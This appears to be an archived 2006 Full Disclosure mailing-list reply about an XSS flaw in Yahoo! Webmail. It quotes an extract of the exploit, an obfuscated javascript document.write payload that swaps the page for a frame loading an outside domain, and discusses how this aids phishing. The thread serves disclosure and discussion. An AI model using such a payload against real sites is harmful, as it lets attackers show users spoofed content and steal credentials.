Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Re[2]: [Argeniss] Alert - Yahoo! Webmail XSS
From: Cesar <cesarc56 () yahoo com>
Date: Tue, 18 Apr 2006 08:18:56 -0700 (PDT)

I know what a Frame it's, but if I forget I know that
you will be there for remind me, thanks..

If you look at the extract of the exploit:
-----------------------------------
(java/**/script:document.write('<frameset cols=100%
rows=100% border=0 frameboarder=0framespacing=0><frame
frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))
-----------------------------------

You can see that the whole HTML document is replaced
after the "document.write" and the frameset only
references a URL that is not under Yahoo! domain. This
means that all displayed content will be from an
external domain, I wonder if web browsers could do
something to alert about this and not just display the
external URL on the status bar. This default browser
behaviour makes phishing a lot easier.



Cesar.

--- Thierry Zoller <Thierry () Zoller lu> wrote:

Dear Cesar Cesar,


C> for a couple of seconds a weird URL, address bar
C> didn't change (MS please change this behaviour!),
but
You know what a Frame is do you ? All browsers
display the source of
the html page in the URL bar, not the source of the
frame(s).

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3
75DD 0AC6 F1C7




__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault